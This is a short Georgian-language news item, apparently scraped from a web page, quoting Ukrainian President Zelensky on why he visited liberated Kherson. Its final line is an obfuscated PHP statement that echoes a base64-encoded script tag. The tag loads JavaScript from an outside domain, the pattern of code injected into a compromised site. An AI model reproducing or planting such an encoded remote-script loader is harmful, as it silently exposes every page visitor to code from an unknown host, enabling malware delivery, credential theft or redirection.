celsiusi
ავერსი შნაიდერი
აუცილებელია აქ ვიყოთ, ვილაპარაკოთ, ხერსონში მცხოვრებ ადამიანებს მხარი დავუჭიროთ ამის შესახებ უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ, გათავისუფლებულ ხერსონში ყოფნისას განაცხადა. 
 
ჟურნალისტის კითხვას – თუ რატომ ჩავიდა პრეზიდენტი ხერსონში, როცა შეეძლო პრეზიდენტის ადმინისტრაციიდანაც ჩაეწერა მიმართვა, პრეზიდენტმა უპასუხა რომ მას სურს, შეიგრძნოს ადამიანების ემოცია.  
 
"გულწრფელად გეტყვით, რომ აქ ჩამოსვლა ჩემთვის ძალიან მნიშვნელოვანი იყო. ჯარისკაცები, ჟურნალისტები, მოქალაქეები რისკავენ საომარი მოქმედებების ზონაში ყოფნით. აუცილებელია აქ ვიყოთ, ვილაპარაკოთ, ხერსონში მცხოვრებ ადამიანებს მხარი დავუჭიროთ. ჩვენ არა მხოლოდ ვსაუბრობთ, არამედ დანაპირებსაც ვასრულებთ. ვიბრუნებთ ტერიტორიებსა და უკრაინის დროშებს თავის ადგილზე ვაბრუნებთ. როგორც პოლიტიკოსს მინდა ამ ადამიანების ემოცია და ენერგია შევიგრძნო. ჩემთვის ეს მოტივაციაა." ამბობს ზელენსკი ჟურნალისტის პასუხად.
438
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");